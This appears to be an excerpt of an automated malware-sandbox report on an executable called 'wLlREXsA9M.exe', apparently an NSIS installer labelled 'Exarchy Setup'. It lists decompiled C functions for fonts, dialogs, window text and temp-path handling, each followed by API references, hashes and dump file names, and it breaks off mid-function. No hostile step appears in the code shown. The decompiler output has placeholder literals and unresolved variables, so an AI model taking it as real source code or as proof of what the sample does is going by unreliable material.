				0x40a7f0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), "true"));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40a800 = E00402AAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40a807 = 1;
				 *0x40a804 = _t15 & 0x00000001;
				 *0x40a805 = _t15 & 0x00000002;
				 *0x40a806 = _t15 & 0x00000004;
				E00405DAF(_t9, _t31, _t33, 0x40a80c,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40a7f0);
				_push(_t18);
				_push(_t33);
				E00405CEB();
				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401d95
0x00401da0
0x00401da2
0x00401daf
0x00401dc6
0x00401dcb
0x00401dd8
0x00401ddd
0x00401de1
0x00401dec
0x00401df3
0x00401e05
0x00401e0b
0x00401e10
0x00401e1a
0x0040258a
0x00401569
0x00402906
0x00402961
0x0040296d

APIs

GetDC.USER32(?), ref: 00401D98
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
ReleaseDC.USER32(?,00000000), ref: 00401DCB
CreateFontIndirectA.GDI32(0040A7F0), ref: 00401E1A

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: c0b6853b70555c11ff3a0fc710e4b69cf4b66ec8e46048978649d46b886a4830
Instruction ID: 370758f94b868890c14fcaaeabbccc8d05307c892d403f7fffcc10352dc9e45b
Opcode Fuzzy Hash: c0b6853b70555c11ff3a0fc710e4b69cf4b66ec8e46048978649d46b886a4830
Instruction Fuzzy Hash: E6017572948340AFE7406B70AE49F9A3FF4AB55315F10847AF201B72E2C6B900569B3F

Uniqueness

Uniqueness Score: -1.00%

Function 00401D3B Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401D3B(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x44);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402ACE(_t21), _t21,  *(_t27 - 0x3c) *  *(_t27 - 0x20),  *(_t27 - 0x38) *  *(_t27 - 0x20), "true"));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401d45
0x00401d4c
0x00401d7b
0x00401d83
0x00401d8a
0x00401d8a
0x00402961
0x0040296d

APIs

GetDlgItem.USER32(?), ref: 00401D3F
GetClientRect.USER32(00000000,?), ref: 00401D4C
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
DeleteObject.GDI32(00000000), ref: 00401D8A

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 80e2f8bee9be89b2dce120ad765519f2908292066a4a215be890969bf7bd1992
Instruction ID: 1488e844374c70fe331834449cc7a1de3ed17120743241a74db2f0b0f9ba2f90
Opcode Fuzzy Hash: 80e2f8bee9be89b2dce120ad765519f2908292066a4a215be890969bf7bd1992
Instruction Fuzzy Hash: B0F0FFB2A04119BFDB11EBA4DE88DAFB7BCEB44301B10447AF601F2191C6749D018B79

Uniqueness

Uniqueness Score: -1.00%

Function 00401C04 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C04(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402AAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402AAC("true");
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402ACE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402ACE("true");
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402ACE();
					_t32 = E00402ACE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402AAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402AAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E00405CEB();
				}
				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c04
0x00401c06
0x00401c0d
0x00401c10
0x00401c13
0x00401c1d
0x00401c21
0x00401c24
0x00401c2d
0x00401c2d
0x00401c30
0x00401c34
0x00401c3d
0x00401c3d
0x00401c40
0x00401c44
0x00401c46
0x00401c9b
0x00401c9d
0x00401ca6
0x00401cae
0x00401cb1
0x00401cb1
0x00401cba
0x00000000
0x00401c48
0x00401c4f
0x00401c51
0x00401c54
0x00401c5a
0x00401c61
0x00401c64
0x00401c8c
0x00401cc0
0x00401cc0
0x00401c66
0x00401c74
0x00401c7c
0x00401c7f
0x00401c7f
0x00401c64
0x00401cc3
0x00401cc6
0x00401ccc
0x00402906
0x00402906
0x00402961
0x0040296d

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C

Strings

!, xrefs: 00401C40

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: ba2cf94d6ffc2b584e8d8da88f13957c701903667b0b5277ef1a6528d0ddc3f0
Instruction ID: 71b022fabad132e33590c88feae64de327c15962b12ec32422a844a44ace25b9
Opcode Fuzzy Hash: ba2cf94d6ffc2b584e8d8da88f13957c701903667b0b5277ef1a6528d0ddc3f0
Instruction Fuzzy Hash: D3219171A44208BEEB15EFA4DA46AED7FB1EF84314F24403EF101B61D1DA7886409B28

Uniqueness

Uniqueness Score: -1.00%

Function 004039D2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004039D2(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405D04(__ecx, "1033");
				while(1) {
					_t26 =  *0x423744;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423710 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423740;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x422ee0 = _t18[1];
					 *0x4237a8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x422edc = _t23;
						E00405CEB(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x41fce8, E00405DAF(_t13, _t24, _t26, 0x422f00, 0xfffffffe));
						_t11 =  *0x42372c;
						_t27 =  *0x423728;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405DAF(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

0x004039d6
0x004039db
0x004039e1
0x004039e6
0x004039e6
0x004039ee
0x00000000
0x00000000
0x004039f6
0x004039fe
0x00403a00
0x00403a06
0x00403a06
0x00403a08
0x00403a14
0x00000000
0x00000000
0x00403a18
0x00000000
0x00000000
0x00000000
0x00403a1a
0x00403a1f
0x00403a28
0x00403a2e
0x00403a33
0x00403a47
0x00403a52
0x00403a6a
0x00403a70
0x00403a75
0x00403a7d
0x00403a9e
0x00403a9e
0x00403a9e
0x00403a7f
0x00403a81
0x00403a81
0x00403a85
0x00403a8c
0x00403a8c
0x00403a91
0x00403a97
0x00403a97
0x00000000
0x00403a81
0x00403a35
0x00403a3a
0x00403a43
0x00403a3c
0x00403a3c
0x00403a3c
0x00403a3a

APIs

SetWindowTextA.USER32(00000000,00422F00), ref: 00403A6A

Strings

"C:\Users\user\Desktop\wLlREXsA9M.exe", xrefs: 004039D3
1033, xrefs: 004039D6, 004039E0, 00403A51
Exarchy Setup: Installing, xrefs: 004039D5

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\wLlREXsA9M.exe"$1033$Exarchy Setup: Installing
API String ID: 530164218-2975097858
Opcode ID: 959cb3ad7c7c6b68853dd440316f43faaaf917eabe3ce8d13a5c0836a1b08c49
Instruction ID: 72e45b3445f441a639b0ba0d544469c28572962e1ff6ff404441957d46a950af
Opcode Fuzzy Hash: 959cb3ad7c7c6b68853dd440316f43faaaf917eabe3ce8d13a5c0836a1b08c49
Instruction Fuzzy Hash: 5E11C3B5B442119BCB20DF15DC80A737BBDEB8571A328813FE941A73D1DA3D9E039A58

Uniqueness

Uniqueness Score: -1.00%

Function 004058ED Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E004058ED(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405D8D(0x421110, _a4);
				_t21 = E00405898(0x421110);
				if(_t21 != 0) {
					E00405FF8(_t21);
					if(( *0x423718 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x421110;
						while(1) {
							_t11 = lstrlenA(0x421110);
							_push(0x421110);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00406091();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405846(0x421110);
								continue;
							} else {
								goto L1;
							}
						}
						E004057FF();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x004058f9
0x00405904
0x00405908
0x0040590f
0x0040591b
0x00405927
0x00405927
0x0040593f
0x00405940
0x00405947
0x00405948
0x00000000
0x00000000
0x0040592b
0x00405932
0x0040593a
0x00000000
0x00000000
0x00000000
0x00000000
0x00405932
0x0040594a
0x00000000
0x0040595e
0x0040591d
0x00405921
0x00000000
0x00000000
0x00000000
0x00000000
0x00405921
0x0040590a
0x00000000

APIs

Part of subcall function 00405D8D: lstrcpynA.KERNEL32(?,?,00000400,0040321B,00422F00,NSIS Error), ref: 00405D9A

Part of subcall function 00405898: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nssF823.tmp,?,00405904,C:\Users\user\AppData\Local\Temp\nssF823.tmp,C:\Users\user\AppData\Local\Temp\nssF823.tmp,75C43410,?,C:\Users\user\AppData\Local\Temp\,0040564F,?,75C43410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058A6
Part of subcall function 00405898: CharNextA.USER32(00000000), ref: 004058AB
Part of subcall function 00405898: CharNextA.USER32(00000000), ref: 004058BF

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nssF823.tmp,00000000,C:\Users\user\AppData\Local\Temp\nssF823.tmp,C:\Users\user\AppData\Local\Temp\nssF823.tmp,75C43410,?,C:\Users\user\AppData\Local\Temp\,0040564F,?,75C43410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405940
GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nssF823.tmp,C:\Users\user\AppData\Local\Temp\nssF823.tmp,C:\Users\user\AppData\Local\Temp\nssF823.tmp,C:\Users\user\AppData\Local\Temp\nssF823.tmp,C:\Users\user\AppData\Local\Temp\nssF823.tmp,C:\Users\user\AppData\Local\Temp\nssF823.tmp,00000000,C:\Users\user\AppData\Local\Temp\nssF823.tmp,C:\Users\user\AppData\Local\Temp\nssF823.tmp,75C43410,?,C:\Users\user\AppData\Local\Temp\,0040564F,?,75C43410,C:\Users\user\AppData\Local\Temp\), ref: 00405950

Strings

C:\Users\user\AppData\Local\Temp\nssF823.tmp, xrefs: 004058F3, 004058F8, 004058FE, 00405939, 0040593F, 00405947, 0040594F
C:\Users\user\AppData\Local\Temp\, xrefs: 004058ED

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nssF823.tmp
API String ID: 3248276644-1395274976
Opcode ID: 2f5f7bd10b83e5c994280ddce28bb3e0edcf250d71028fabecdb2709bf5dd46b
Instruction ID: 4071fa4f4a21fb21d39c296c3fa08277b6f6d99138fd369601fd9f6663fee1a4
Opcode Fuzzy Hash: 2f5f7bd10b83e5c994280ddce28bb3e0edcf250d71028fabecdb2709bf5dd46b
Instruction Fuzzy Hash: 26F028B2504D51A9C722363A1C49BAF1645CE87374719493BFC91B22D2CA3C89539EBE

Uniqueness

Uniqueness Score: -1.00%

Function 004057FF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004057FF(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409014);
				}
				return _t7;
			}

0x00405800
0x00405817
0x0040581f
0x0040581f
0x00405827

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040315A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040335D), ref: 00405805
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040315A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040335D), ref: 0040580E
lstrcatA.KERNEL32(?,00409014), ref: 0040581F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004057FF

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
Instruction ID: 7c008ddc559345a9e5967170f4bd8d538ee26b8c95fe895f1d3f746697f49726
Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
Instruction Fuzzy Hash: 0CD0A9726059306AE2022316AC09E8B2E48CF86324B048033F200F62A2C63C0D418BFE

Uniqueness

Uniqueness Score: -1.00%

Function 00405898 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405898(CHAR* _a4) {
				CHAR* _t5;
				char* _t7;
				CHAR* _t9;
				char _t10;
				CHAR* _t11;
				void* _t13;

				_t11 = _a4;
				_t9 = CharNextA(_t11);
				_t5 = CharNextA(_t9);
				_t10 =  *_t11;
				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
					if(_t10 != 0x5c || _t11[1] != _t10) {
						L10:
						return 0;
					} else {
						_t13 = 2;
						while(1) {
							_t13 = _t13 - 1;
							_t7 = E0040582A(_t5, "true");
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 1;
							if(_t13 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextA(_t5);
				}
			}

0x004058a1
0x004058a8
0x004058ab
0x004058ad
0x004058b1
0x004058c6
0x004058e5
0x00000000
0x004058cd
0x004058cf
0x004058d0
0x004058d3
0x004058d4
0x004058dc
0x00000000
0x00000000
0x004058de
0x004058e1
0x00000000
0x00000000
0x00000000
0x004058e1
0x00000000
0x004058d0
0x004058be
0x00000000
0x004058bf

APIs

CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nssF823.tmp,?,00405904,C:\Users\user\AppData\Local\Temp\nssF823.tmp,C:\Users\user\AppData\Local\Temp\nssF823.tmp,75C43410,?,C:\Users\user\AppData\Local\Temp\,0040564F,?,75C43410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058A6
CharNextA.USER32(00000000), ref: 004058AB
CharNextA.USER32(00000000), ref: 004058BF

Strings

C:\Users\user\AppData\Local\Temp\nssF823.tmp, xrefs: 00405899

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nssF823.tmp
API String ID: 3213498283-1755549536
Opcode ID: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
Instruction ID: 0b266400b1abbea43c0b8a4624d6df7dceda2b5bbb33ac445da0bb52ce026f0f
Opcode Fuzzy Hash: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
Instruction Fuzzy Hash: 7DF0F653914F90AAFB3272645C44B7B5FA8CB55314F14C47BED40B62C1C6BC48615FAA

Uniqueness

Uniqueness Score: -1.00%

Function 00402C96 Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C96(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x4168c0; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42370c;
						if(_t2 >  *0x42370c) {
							_t3 = CreateDialogParamA( *0x423700, 0x6f, 0, E00402C13, 0);
							 *0x4168c0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406162(0);
					}
				} else {
					_t6 =  *0x4168c0; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x4168c0 = 0;
					return _t6;
				}
			}

0x00402c9d
0x00402cb7
0x00402cbd
0x00402cc7
0x00402ccd
0x00402cd3
0x00402ce4
0x00402ced
0x00000000
0x00402cf2
0x00402cf9
0x00402cbf
0x00402cc6
0x00402cc6
0x00402c9f
0x00402c9f
0x00402ca6
0x00402ca9
0x00402ca9
0x00402caf
0x00402cb6
0x00402cb6

APIs

DestroyWindow.USER32(00000000,00000000,00402E76,00000001), ref: 00402CA9
GetTickCount.KERNEL32 ref: 00402CC7
CreateDialogParamA.USER32(0000006F,00000000,00402C13,00000000), ref: 00402CE4
ShowWindow.USER32(00000000,00000005), ref: 00402CF2

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 971d32a5862e25b41bf1bb994f935c0028a7f4fa713540e3a4c555c70e17188a
Instruction ID: f9eeb5e7be100a85ca2196d6bdabc41b7d0cda90c13dfbc916e179756f985414
Opcode Fuzzy Hash: 971d32a5862e25b41bf1bb994f935c0028a7f4fa713540e3a4c555c70e17188a
Instruction Fuzzy Hash: A2F05E7090A220ABD6217B64FE0C9DF7BA4F741B52B01857AF141B11E4C379988ACB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00404F1A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404F1A(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t11;
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					__eflags = _t15 - 0x200;
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						__eflags = _t15 - 0x419;
						if(_t15 == 0x419) {
							__eflags =  *0x41fcf4 - _t16; // 0x0
							if(__eflags != 0) {
								_push(_t16);
								_push(6);
